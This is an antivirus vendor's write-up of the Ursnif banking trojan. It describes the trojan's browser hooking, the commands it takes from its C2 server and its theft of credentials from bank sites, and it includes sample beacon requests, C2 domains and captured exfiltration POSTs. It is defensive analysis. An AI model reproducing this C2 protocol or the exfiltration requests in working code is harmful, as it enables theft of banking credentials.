Home / malwarePDF  

Trojan.Spy.Ursnif.F


First posted on 21 November 2011.
Source: BitDefender

Aliases :

There are no other names known for Trojan.Spy.Ursnif.F.

Explanation :

Trojan.Spy.Ursnif is a malware that is able to steal personal information and control the infected computer.

It finds out the type of browser (iexplorer, firefox, safari, chrome, opera), information used later for stealing specific passwords.
It takes a snapshot of all the processes and injects itself to iexplore or firefox and also hooks some functions: InternetReadFile,
InternetWriteFile, CreateProcess, HttpSendRequest to intercept browser trafic.

The backdoor behaviour starts when it connects to a server that appers with diffrent host names : rettinasl.com, hasterulits.com, thecargotime.com, tryfindithere.com. From time to time it sends requests to the server. The request has a standard form:
GET /cgi-bin/cmd.cgi?user_id=2806922672&version_id=2037028&passphrase=fkjvhsdvlksdhvlsd&socks=0&version=2037028&crc=00000000 HTTP/1.1

The version id is memorized in a registry key:

Subkey = HKCUSoftwareAppDataLow{0a7cdb08-42c7-a17a-bc91-b0554eeb624f}
Value = Version
Data = Hex:001F1524 , Decimal:2037028
The user_id is random.

If the request succeeds and the connection is established the malware takes control:
- it receives commands:
- download - DL_EXE=http://ne[removed].cn/sol.exe /DL_EXE_ST=http://ne[removed].cn /sol.exe ;
- kill windows - KILL (writes in "\.C:" a 0x10000 size buffer( the module of the current process));
- reboot system - REBOOT;
- take screenshots - SCREENSHOT;
- delete cookies - CLEAR_COOK;

- when the user logs on diffrent internet accounts it sends the private information (user_name,passwords) to a remote location:
example wireshark capture:

POST /cgi-bin/forms.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------2b01852b01852b0185
User-Agent: IE
Host: tryfindithere.com
Content-Length: 337
Cache-Control: no-cache
----------------------------2b01852b01852b0185
Content-Disposition: form-data; name="upload_file"; filename="2806922672.2037028"
Content-Type: application/octet-stream
URL: http://fa[removed]war.com/index.php
login_username=TEST&login_password=TEST&serverid=1&submitit.x=89&submitit.y=23

- it downloads an encrypted buffer to a memory location that contains :
- the names of some bank websites : millenniumbcp.pt , santandertotta.pt, grupobanif, caixaebanking.cgd.pt;
- some javascript code to identify and steal passwords, user names, card pins from those bank websites;

- also when the user logs on those bank websites, screenshot pictures are send to a remote location :
example wireshark capture:

POST /cgi-bin/ss.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------905c4c905c4c905c4c
User-Agent: IE
Host: thecargotime.com
Content-Length: 146030
Cache-Control: no-cache
----------------------------905c4c905c4c905c4c
Content-Disposition: form-data; name="upload_file"; filename="2806922672.2037028"
Content-Type: application/octet-stream

GIF1
GIF2...

It creates events with restricted rights: denied for guest and anonymouse users ( D:(D;OICI;GA;;;BG)(D;OICI;GA;;;AN)(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)).
Every action is executed by threads that are syncronized using critical sections or events.
It uses a pipe for communication between threads (read/write).

Last update 21 November 2011

 

TOP